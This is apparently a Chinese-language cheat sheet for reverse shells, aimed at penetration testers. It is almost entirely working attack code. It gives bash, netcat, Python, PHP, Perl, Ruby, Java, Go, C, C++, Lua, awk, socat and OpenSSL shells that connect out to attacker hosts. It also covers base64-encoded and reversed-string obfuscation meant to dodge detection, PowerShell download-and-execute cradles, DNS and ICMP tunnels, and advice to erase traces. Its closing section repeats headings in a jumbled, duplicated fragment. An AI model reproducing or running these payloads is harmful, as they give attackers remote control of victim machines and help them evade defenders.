反弹Shell方式全面指南<\/h1>

1. 反弹Shell基础概念<\/h2>
反弹Shell(Reverse Shell)是一种攻击技术，使目标机器主动连接攻击者控制的机器，从而绕过防火墙限制。与正向Shell相比，反弹Shell在渗透测试中更为常用。<\/p>

2. Bash反弹Shell<\/h2>

基本形式<\/h3>
bash -i >& \/dev\/tcp\/[<\/span>host]<\/span>\/[<\/span>port]<\/span> 0>&1<\/span>
<\/span><\/span>\/bin\/bash -i > \/dev\/tcp\/[<\/span>host]<\/span>\/[<\/span>port]<\/span> 0<&1<\/span> 2>&1<\/span>
<\/span><\/span><\/code><\/pre>Base64编码版<\/h3>
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC43LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}'<\/span>
<\/span><\/span><\/code><\/pre>其中base64字符串是bash -i >& \/dev\/tcp\/10.10.14.7\/4444 0>&1<\/code>的编码<\/p>
混淆技巧<\/h3>

基础指令：echo "bash -i >& \/dev\/tcp\/192.168.43.47\/4444 0>&1" | bash<\/code><\/li>
Base64编码：ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjQ3LzQ0NDQgMD4mMSIgfCBiYXNo<\/code><\/li>
反转字符串：oNXYiBCfgISMm4DMgQDN0QzL3QjLzQjL4YTMuITOx8CcjR3L2VGZvAiJ+ASatACazFmYiAyboNWZ<\/code><\/li>
多层嵌套：<\/li>
<\/ol>
echo oNXYiBCfgISMm4DMgQDN0QzL3QjLzQjL4YTMuITOx8CcjR3L2VGZvAiJ+ASatACazFmYiAyboNWZ | rev |base64 -d |bash
<\/span><\/span><\/code><\/pre>
变量套用：<\/li>
<\/ol>
s=<\/span>`<\/span>echo oNXYiBCfgISMm4DMgQDN0QzL3QjLzQjL4YTMuITOx8CcjR3L2VGZvAiJ+ASatACazFmYiAyboNWZ | rev |base64 -d |bash`<\/span>;$s
<\/span><\/span><\/code><\/pre>3. Curl反弹Shell<\/h2>

本地创建sh文件(如5555.sh)：<\/li>
<\/ol>
bash -i >& \/dev\/tcp\/10.10.16.17\/5555 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
使用curl加载：<\/li>
<\/ol>
curl 10.10.16.17\/5555.sh|bash
<\/span><\/span><\/code><\/pre>4. Netcat(nc)反弹Shell<\/h2>
不同版本nc用法<\/h3>
nc -e \/bin\/bash [<\/span>host]<\/span> [<\/span>port]<\/span>
<\/span><\/span>\/bin\/bash | nc [<\/span>host]<\/span> [<\/span>port]<\/span>
<\/span><\/span><\/code><\/pre>管道方式<\/h3>
mknod backpipe p &&<\/span> nc [<\/span>host]<\/span> [<\/span>port]<\/span> 0<backpipe | \/bin\/bash 1>backpipe
<\/span><\/span>nc [<\/span>host]<\/span> [<\/span>输入port]<\/span> | \/bin\/bash | nc [<\/span>host]<\/span> [<\/span>输出port]<\/span>
<\/span><\/span>rm -f \/tmp\/p; mknod \/tmp\/p p &&<\/span> nc [<\/span>host]<\/span> [<\/span>port]<\/span> 0\/tmp\/
<\/span><\/span><\/code><\/pre>nc版本问题解决方案<\/h3>
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc [<\/span>host]<\/span> [<\/span>port]<\/span> >\/tmp\/f
<\/span><\/span><\/code><\/pre>5. Exec反弹Shell<\/h2>
exec 5<>\/dev\/tcp\/[<\/span>host]<\/span>\/[<\/span>port]<\/span>;cat <&5<\/span> | while<\/span> read line; do<\/span> $line 2>&5<\/span> >&5; done<\/span>
<\/span><\/span>exec 2>&0<\/span> 0<&196;exec 196<>\/dev\/tcp\/[<\/span>host]<\/span>\/[<\/span>port]<\/span>; bash <&196<\/span> >&196<\/span> 2>&196<\/span>
<\/span><\/span><\/code><\/pre>6. Powercat反弹Shell<\/h2>
Powercat是Netcat的PowerShell版本，功能更强且免杀性更好：<\/p>
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http:\/\/10.10.14.9:8000\/powercat.ps1');powercat -c 10.10.14.9 -p 4444 -e cmd"<\/span>
<\/span><\/span><\/code><\/pre>7. Telnet反弹Shell<\/h2>
telnet [<\/span>host]<\/span> [<\/span>输入port]<\/span> | \/bin\/bash | telnet [<\/span>host]<\/span> [<\/span>输出port]<\/span>
<\/span><\/span>rm -f \/tmp\/p; mknod \/tmp\/p p &&<\/span> telnet [<\/span>host]<\/span> [<\/span>port]<\/span> 0\/tmp\/p
<\/span><\/span>mknod backpipe p &&<\/span> telnet [<\/span>host]<\/span> [<\/span>port]<\/span> 0<backpipe | \/bin\/bash 1>backpipe
<\/span><\/span><\/code><\/pre>8. Python反弹Shell<\/h2>
单行命令<\/h3>
python -<\/span>c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['\/bin\/bash','-i']);"<\/span>
<\/span><\/span><\/code><\/pre>完整脚本<\/h3>
#!\/usr\/bin\/python3<\/span>
<\/span><\/span>import<\/span> os
<\/span><\/span>import<\/span> pty
<\/span><\/span>import<\/span> socket
<\/span><\/span>
<\/span><\/span>lhost =<\/span> ""<\/span>
<\/span><\/span>lport =<\/span> 4444<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> main<\/span>():
<\/span><\/span>    s =<\/span> socket.<\/span>socket(socket.<\/span>AF_INET, socket.<\/span>SOCK_STREAM)
<\/span><\/span>    s.<\/span>connect((lhost, lport))
<\/span><\/span>    os.<\/span>dup2(s.<\/span>fileno(), 0<\/span>)
<\/span><\/span>    os.<\/span>dup2(s.<\/span>fileno(), 1<\/span>)
<\/span><\/span>    os.<\/span>dup2(s.<\/span>fileno(), 2<\/span>)
<\/span><\/span>    os.<\/span>putenv("HISTFILE"<\/span>, '\/dev\/null'<\/span>)
<\/span><\/span>    pty.<\/span>spawn("\/bin\/bash"<\/span>)
<\/span><\/span>    s.<\/span>close()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    main()
<\/span><\/span><\/code><\/pre>交互式Shell升级<\/h3>
python3 -<\/span>c 'import pty;pty.spawn("bash")'<\/span>
<\/span><\/span>python3 -<\/span>c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>9. PHP反弹Shell<\/h2>
php<\/span> -<\/span>r<\/span> 'exec("\/bin\/bash -i >& \/dev\/tcp\/[host]\/[port]");'<\/span>
<\/span><\/span>php<\/span> -<\/span>r<\/span> '$sock=fsockopen("[host]",[port]);exec("\/bin\/bash -i <&3 >&3 2>&3");'<\/span>
<\/span><\/span><\/code><\/pre>配合nc使用<\/h3>
<?<\/span>php<\/span> system<\/span>("rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc [host] [port] >\/tmp\/f"<\/span>); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>10. Perl反弹Shell<\/h2>
基本形式<\/h3>
perl -<\/span>e 'use Socket;$i="[host]";$p=[port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("\/bin\/sh -i");};'<\/span>
<\/span><\/span><\/code><\/pre>不依赖\/bin\/sh<\/h3>
perl -<\/span>MIO -<\/span>e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[host]:[port]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'<\/span>
<\/span><\/span><\/code><\/pre>11. Ruby反弹Shell<\/h2>
基本形式<\/h3>
ruby -<\/span>rsocket -<\/span>e'f=TCPSocket.open("[host]",[port]).to_i;exec sprintf("\/bin\/sh -i <&%d >&%d 2>&%d",f,f,f)'<\/span>
<\/span><\/span><\/code><\/pre>不依赖\/bin\/bash<\/h3>
ruby -<\/span>rsocket -<\/span>e 'exit if fork;c=TCPSocket.new("[host]","[port]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'<\/span>
<\/span><\/span><\/code><\/pre>12. Java反弹Shell<\/h2>
Base64写法<\/h3>
Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>完整过程<\/h3>

创建ReverseShell.java文件：<\/li>
<\/ol>
public<\/span> class<\/span> ReverseShell<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Runtime r =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span>
<\/span><\/span>        String cmd[]=<\/span> {<\/span>"\/bin\/bash"<\/span>,<\/span>"-c"<\/span>,<\/span>"exec 5<>\/dev\/tcp\/[host]\/[port];cat <&5 | while read line; do $line 2>&5 >&5; done"<\/span>};<\/span>
<\/span><\/span>        Process p =<\/span> r.<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>        p.<\/span>waitFor<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
编译执行：<\/li>
<\/ol>
javac ReverseShell.java
<\/span><\/span>java ReverseShell
<\/span><\/span><\/code><\/pre>13. Go反弹Shell<\/h2>
使用工具<\/h3>
https:\/\/github.com\/TheKingOfDuck\/ReverseGoShell\/<\/p>
脚本执行<\/h3>

编写ReverseShell.go：<\/li>
<\/ol>
package<\/span> main<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> (
<\/span><\/span>    "net"<\/span>
<\/span><\/span>    "os"<\/span>
<\/span><\/span>    "os\/exec"<\/span>
<\/span><\/span>)
<\/span><\/span>
<\/span><\/span>func<\/span> main<\/span>() {
<\/span><\/span>    conn<\/span>, err<\/span> :=<\/span> net<\/span>.Dial<\/span>("tcp"<\/span>, "192.168.0.23:2233"<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        os<\/span>.Exit<\/span>(1<\/span>)
<\/span><\/span>    }
<\/span><\/span>    cmd<\/span> :=<\/span> exec<\/span>.Command<\/span>("\/bin\/sh"<\/span>)
<\/span><\/span>    cmd<\/span>.Stdin<\/span> = conn<\/span>
<\/span><\/span>    cmd<\/span>.Stdout<\/span> = conn<\/span>
<\/span><\/span>    cmd<\/span>.Stderr<\/span> = conn<\/span>
<\/span><\/span>    cmd<\/span>.Run<\/span>()
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译执行：<\/li>
<\/ol>
go build ReverseShell.go
<\/span><\/span>.\/ReverseShell
<\/span><\/span><\/code><\/pre>14. GCC(C)反弹Shell<\/h2>
Linux版本<\/h3>

编写ReverseShell.c：<\/li>
<\/ol>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/socket.h><\/span>
<\/span><\/span><\/span>#include<\/span> <arpa\/inet.h><\/span>
<\/span><\/span><\/span>#include<\/span> <signal.h><\/span>
<\/span><\/span><\/span>#include<\/span> <dirent.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/stat.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> tcp_port =<\/span> 6666<\/span>;
<\/span><\/span>char<\/span> *<\/span>ip =<\/span> "192.168.17.129"<\/span>;
<\/span><\/span>
<\/span><\/span>void<\/span> reverse_shell<\/span>(){
<\/span><\/span>    int<\/span> fd;
<\/span><\/span>    if<\/span> (fork() <=<\/span> 0<\/span>){
<\/span><\/span>        struct<\/span> sockaddr_in addr;
<\/span><\/span>        addr.sin_family =<\/span> AF_INET;
<\/span><\/span>        addr.sin_port =<\/span> htons(tcp_port);
<\/span><\/span>        addr.sin_addr.s_addr =<\/span> inet_addr(ip);
<\/span><\/span>
<\/span><\/span>        fd =<\/span> socket(AF_INET, SOCK_STREAM, 0<\/span>);
<\/span><\/span>        if<\/span> (connect(fd, (struct<\/span> sockaddr*<\/span>)&<\/span>addr, sizeof<\/span>(addr))){
<\/span><\/span>            exit(0<\/span>);
<\/span><\/span>        }
<\/span><\/span>
<\/span><\/span>        dup2(fd, 0<\/span>);
<\/span><\/span>        dup2(fd, 1<\/span>);
<\/span><\/span>        dup2(fd, 2<\/span>);
<\/span><\/span>        execve("\/bin\/bash"<\/span>, 0LL<\/span>, 0LL<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> main<\/span>(int<\/span> argc, char<\/span> const<\/span> *<\/span>argv[]){
<\/span><\/span>    reverse_shell();
<\/span><\/span>    return<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
编译执行：<\/li>
<\/ol>
gcc ReverseShell.c -o ReverseShell
<\/span><\/span>.\/ReverseShell
<\/span><\/span><\/code><\/pre>15. G++(C++)反弹Shell<\/h2>
Windows版本<\/h3>
#include<\/span> <iostream><\/span>
<\/span><\/span><\/span>#include<\/span> <winsock2.h><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <ws2tcpip.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <synchapi.h><\/span>
<\/span><\/span><\/span><\/span>using<\/span> namespace<\/span> std;
<\/span><\/span>
<\/span><\/span>SOCKET Winsock;
<\/span><\/span>WORD wVersionRequested;
<\/span><\/span>WSADATA wsaData;
<\/span><\/span>struct<\/span> sockaddr_in<\/span> hax;
<\/span><\/span>char<\/span> ip_addr[16<\/span>] =<\/span> "*.*.*.*"<\/span>;
<\/span><\/span>char<\/span> port[6<\/span>] =<\/span> "8888"<\/span>;
<\/span><\/span>STARTUPINFO ini_processo;
<\/span><\/span>PROCESS_INFORMATION processo_info;
<\/span><\/span>
<\/span><\/span>int<\/span> __cdecl<\/span> main<\/span>(){   
<\/span><\/span>    int<\/span> err;
<\/span><\/span>    while<\/span>(1<\/span>){
<\/span><\/span>        err =<\/span> WSAStartup(MAKEWORD(2<\/span>, 2<\/span>), &<\/span>wsaData);
<\/span><\/span>        if<\/span>(err !=<\/span> 0<\/span>){
<\/span><\/span>            printf("WSAStartup failed with error: %d<\/span>\n<\/span>"<\/span>, err);
<\/span><\/span>            return<\/span> 1<\/span>;
<\/span><\/span>        }
<\/span><\/span>        Winsock =<\/span> WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned<\/span> int<\/span>)NULL, (unsigned<\/span> int<\/span>)NULL);
<\/span><\/span>        if<\/span>(Winsock==<\/span>INVALID_SOCKET){
<\/span><\/span>            wprintf(L<\/span>"WSASocket function failed with error = %d<\/span>\n<\/span>"<\/span>, WSAGetLastError());
<\/span><\/span>        }
<\/span><\/span>        else<\/span>{
<\/span><\/span>            struct<\/span> hostent<\/span> *<\/span>host;
<\/span><\/span>            host =<\/span> gethostbyname(ip_addr);
<\/span><\/span>            strcpy_s(ip_addr, inet_ntoa(*<\/span>((struct<\/span> in_addr<\/span> *<\/span>)host-><\/span>h_addr)));
<\/span><\/span>            hax.sin_family =<\/span> AF_INET;
<\/span><\/span>            hax.sin_port =<\/span> htons(atoi(port));
<\/span><\/span>            hax.sin_addr.s_addr =<\/span> inet_addr(ip_addr);
<\/span><\/span>            memset(&<\/span>hax.sin_zero, 0<\/span>, 8<\/span>);
<\/span><\/span>            err =<\/span> connect(Winsock, (struct<\/span> sockaddr<\/span> *<\/span>)&<\/span>hax, sizeof<\/span>(struct<\/span> sockaddr<\/span>));
<\/span><\/span>            if<\/span> (err ==<\/span> SOCKET_ERROR) {
<\/span><\/span>                wprintf(L<\/span>"connect function failed with error: %ld<\/span>\n<\/span>"<\/span>, WSAGetLastError());
<\/span><\/span>                return<\/span> 1<\/span>;
<\/span><\/span>            }else<\/span>{
<\/span><\/span>                memset(&<\/span>ini_processo, 0<\/span>, sizeof<\/span>(ini_processo));
<\/span><\/span>                ini_processo.cb =<\/span> sizeof<\/span>(ini_processo);
<\/span><\/span>                ini_processo.dwFlags =<\/span> STARTF_USESTDHANDLES |<\/span> STARTF_USESHOWWINDOW;
<\/span><\/span>                ini_processo.hStdInput =<\/span> ini_processo.hStdOutput =<\/span> ini_processo.hStdError =<\/span> (HANDLE)Winsock;
<\/span><\/span>
<\/span><\/span>                TCHAR cmd[255<\/span>] =<\/span> TEXT("cmd.exe"<\/span>);
<\/span><\/span>
<\/span><\/span>                CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0<\/span>, NULL, NULL, &<\/span>ini_processo, &<\/span>processo_info);
<\/span><\/span>
<\/span><\/span>                return<\/span> 0<\/span>;
<\/span><\/span>            }
<\/span><\/span>            err =<\/span> closesocket((SOCKET)Winsock);
<\/span><\/span>            if<\/span>(err ==<\/span> SOCKET_ERROR){
<\/span><\/span>                wprintf(L<\/span>"closesocket function failed with error: %ld<\/span>\n<\/span>"<\/span>, WSAGetLastError());
<\/span><\/span>                WSACleanup();
<\/span><\/span>                return<\/span> 1<\/span>;
<\/span><\/span>            }
<\/span><\/span>            WSACleanup();
<\/span><\/span>            return<\/span> 0<\/span>;
<\/span><\/span>        }
<\/span><\/span>        Sleep(30000<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译：<\/p>
g++ reverse_shell_win.cpp -static -lwsock32 -lws2_32 -o reverse_shell_win.exe
<\/span><\/span><\/code><\/pre>16. OpenSSL加密反弹Shell<\/h2>
生成证书<\/h3>
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365<\/span> -nodes
<\/span><\/span><\/code><\/pre>服务端监听<\/h3>
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888<\/span>
<\/span><\/span><\/code><\/pre>Linux反弹<\/h3>
mkfifo \/tmp\/s; \/bin\/sh -i < \/tmp\/s 2>&1<\/span> | openssl s_client -quiet -connect [<\/span>host]<\/span>:[<\/span>port]<\/span>> \/tmp\/s; rm \/tmp\/s
<\/span><\/span><\/code><\/pre>Windows反弹<\/h3>

服务端开启两个监听：<\/li>
<\/ol>
openssl s_server -quiet -key key.pem -cert cert.pem -port [<\/span>port1]<\/span>
<\/span><\/span>openssl s_server -quiet -key key.pem -cert cert.pem -port [<\/span>port2]<\/span>
<\/span><\/span><\/code><\/pre>
客户端执行：<\/li>
<\/ol>
openssl s_client -quiet -connect [<\/span>host]<\/span>:[<\/span>port1]<\/span> | cmd.exe | openssl s_client -quiet -connect [<\/span>host]<\/span>:[<\/span>port2]<\/span>
<\/span><\/span><\/code><\/pre>17. Lua反弹Shell<\/h2>
lua -<\/span>e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('\/bin\/sh -i <&3 >&3 2>&3');"<\/span>
<\/span><\/span><\/code><\/pre>18. Awk\/Gawk反弹Shell<\/h2>
Awk方式<\/h3>
\/home\/a 'BEGIN{s="\/inet\/tcp\/0\/[host]\/[port]"
<\/span><\/span><\/span>for(;s|&getline c;close(c))while (c|getline)print|&s;close(s)}'<\/span>
<\/span><\/span><\/code><\/pre>Gawk方式<\/h3>
gawk 'BEGIN{s="\/inet\/tcp\/0\/[host]\/[port]";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'<\/span>
<\/span><\/span><\/code><\/pre>19. Socat反弹Shell<\/h2>
TCP方式<\/h3>
攻击端：<\/p>
.\/socat TCP-LISTEN:ip -
<\/span><\/span><\/code><\/pre>目标端：<\/p>
.\/socat exec:'bash -li'<\/span>,pty,stderr,setsid,sigint,sane tcp:ip:port
<\/span><\/span><\/code><\/pre>UDP方式<\/h3>
socat udp-connect:攻击者ip:端口 exec:'bash -li'<\/span>,pty,stderr,sane 2>&1>\/dev\/null &
<\/span><\/span><\/code><\/pre>20. MSF反弹Shell<\/h2>
MSF框架提供多种方式生成和反弹Shell：<\/p>

msfconsole - 管理生成的exp和管理反弹的shell<\/li>
msfvenom - 制作木马<\/li>
msfencode - 对木马进行编码<\/li>
Auxiliary - 辅助模块<\/li>
meterpreter - 连接<\/li>
<\/ol>
21. Cobalt Strike反弹Shell<\/h2>
Cobalt Strike是一个商业渗透测试工具，提供完整的反弹Shell和后渗透功能。<\/p>
22. Nishang反弹Shell<\/h2>
Nishang是基于PowerShell的攻击框架，支持多种反弹Shell方式。<\/p>
Reverse TCP Shell<\/h3>
攻击机：<\/p>
nc -lvp [<\/span>port]<\/span>
<\/span><\/span><\/code><\/pre>目标机：<\/p>
powershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/[host]\/nishang\/Shells\/Invoke-PowerShellTcp.ps1'<\/span>);Invoke-PowerShellTcp -Reverse -IPAddress [host]<\/span> -port [port]<\/span>
<\/span><\/span><\/code><\/pre>Reverse UDP Shell<\/h3>
攻击机：<\/p>
nc -lvup [<\/span>port]<\/span>
<\/span><\/span><\/code><\/pre>目标机：<\/p>
powershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/[host]\/nishang\/Shells\/Invoke-PowerShellUdp.ps1'<\/span>);Invoke-PowerShellUdp -Reverse -IPAddress [host]<\/span> -port [port]<\/span>
<\/span><\/span><\/code><\/pre>Reverse ICMP Shell<\/h3>
需要icmpsh_m.py和Invoke-PowerShellIcmp.ps1<\/p>
攻击端：<\/p>
sysctl -w net.ipv4.icmp_echo_ignore_all=<\/span>1<\/span>
<\/span><\/span>python icmpsh_m.py [<\/span>Attacker IP]<\/span> [<\/span>Victim IP]<\/span>
<\/span><\/span><\/code><\/pre>目标机：<\/p>
powershell IEX (New-Object Net.WebClient).DownloadString('http:\/\/[host]\/nishang\/Shells\/Invoke-PowerShellIcmp.ps1'<\/span>);Invoke-PowerShellIcmp -IPAddress [host]<\/span>
<\/span><\/span><\/code><\/pre>自定义PowerShell函数<\/h3>
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('[host]',[port]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"<\/span>
<\/span><\/span><\/code><\/pre>23. dnscat2反弹DNS Shell<\/h2>
dnscat2是一个DNS隧道工具，通过DNS协议创建加密的C&C通道。<\/p>
攻击机：<\/p>
ruby dnscat2.rb --dns "domain=lltest.com,host=192.168.159.129"<\/span> --no-cache -e open
<\/span><\/span><\/code><\/pre>目标机：<\/p>
powershell IEX (New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/lukebaggett\/dnscat2-powershell\/master\/dnscat2.ps1'<\/span>);Start-Dnscat2 -Domain lltest.com -DNSServer [host]<\/span>
<\/span><\/span><\/code><\/pre>24. 交互式Shell升级方法<\/h2>
Python pty方法<\/h3>
python3 -<\/span>c 'import pty; pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>完整交互式升级步骤<\/h3>

执行Python命令后按Ctrl+z<\/li>
获取term值：echo $TERM<\/code><\/li>
获取rows和columns：stty -a<\/code><\/li>
关闭输入回显：stty raw -echo<\/code><\/li>
进入前台：fg<\/code><\/li>
重置：reset<\/code><\/li>
设置环境变量：<\/li>
<\/ol>
export SHELL=<\/span>bash
<\/span><\/span>export TERM=[<\/span>前面获取的term值]<\/span>
<\/span><\/span>stty [<\/span>前面获取的rows和columns值]<\/span>
<\/span><\/span><\/code><\/pre>Socat方法<\/h3>
攻击机：<\/p>
socat file:`<\/span>tty`<\/span>,raw,echo=<\/span>0<\/span> tcp-listen:[<\/span>port]<\/span>
<\/span><\/span><\/code><\/pre>目标机：<\/p>
\/tmp\/socat exec:'bash -li'<\/span>,pty,stderr,setsid,sigint,sane tcp:[<\/span>host]<\/span>:[<\/span>port]<\/span>
<\/span><\/span><\/code><\/pre>Script方法<\/h3>
script \/dev\/null
<\/span><\/span><\/code><\/pre>25. 小知识点<\/h2>
Linux中#!\/bin\/bash和#!\/bin\/sh的区别<\/h3>

\/bin\/sh<\/code>通常指向\/bin\/dash<\/code>(Debian\/Ubuntu)或\/bin\/bash<\/code>(其他发行版)<\/li>
dash<\/code>是bash<\/code>的精简版，不支持某些功能如let<\/code>、source<\/code>等命令<\/li>
#!\/bin\/sh<\/code>脚本应遵循POSIX标准，而#!\/bin\/bash<\/code>可以使用bash特有功能<\/li>
<\/ol>
反弹Shell中的编码与混淆<\/h3>

Base64编码可以绕过简单过滤<\/li>
字符串反转增加检测难度<\/li>
多层嵌套使分析更困难<\/li>
变量套用隐藏真实意图<\/li>
<\/ol>
注意事项<\/h3>

不同系统\/版本可能有差异，需测试<\/li>
防火墙\/IDS可能拦截特定方式<\/li>
加密方式(如OpenSSL)可提高隐蔽性<\/li>
交互式Shell对后续操作很重要<\/li>
清理痕迹是必要步骤<\/li>
<\/ol>
本指南涵盖了从基础到高级的各种反弹Shell技术，适用于不同环境和需求。使用时请遵守法律法规，仅用于授权测试。<\/p>
反弹Shell方式全面指南<\/h1>

1. 反弹Shell基础概念<\/h2> 反弹Shell(Reverse Shell)是一种攻击技术，使目标机器主动连接攻击者控制的机器，从而绕过防火墙限制。与正向Shell相比，反弹Shell在渗透测试中更为常用。<\/p>

2. Bash反弹Shell<\/h2>

4. Netcat(nc)反弹Shell<\/h2>

8. Python反弹Shell<\/h2>

10. Perl反弹Shell<\/h2>

11. Ruby反弹Shell<\/h2>

12. Java反弹Shell<\/h2>

13. Go反弹Shell<\/h2>

使用工具<\/h3> https:\/\/github.com\/TheKingOfDuck\/ReverseGoShell\/<\/p>

14. GCC(C)反弹Shell<\/h2>

15. G++(C++)反弹Shell<\/h2>

16. OpenSSL加密反弹Shell<\/h2>

18. Awk\/Gawk反弹Shell<\/h2>

19. Socat反弹Shell<\/h2>

21. Cobalt Strike反弹Shell<\/h2> Cobalt Strike是一个商业渗透测试工具，提供完整的反弹Shell和后渗透功能。<\/p>

22. Nishang反弹Shell<\/h2> Nishang是基于PowerShell的攻击框架，支持多种反弹Shell方式。<\/p>

24. 交互式Shell升级方法<\/h2>

25. 小知识点<\/h2>

1. 反弹Shell基础概念<\/h2>
反弹Shell(Reverse Shell)是一种攻击技术，使目标机器主动连接攻击者控制的机器，从而绕过防火墙限制。与正向Shell相比，反弹Shell在渗透测试中更为常用。<\/p>

使用工具<\/h3>
https:\/\/github.com\/TheKingOfDuck\/ReverseGoShell\/<\/p>

21. Cobalt Strike反弹Shell<\/h2>
Cobalt Strike是一个商业渗透测试工具，提供完整的反弹Shell和后渗透功能。<\/p>

22. Nishang反弹Shell<\/h2>
Nishang是基于PowerShell的攻击框架，支持多种反弹Shell方式。<\/p>
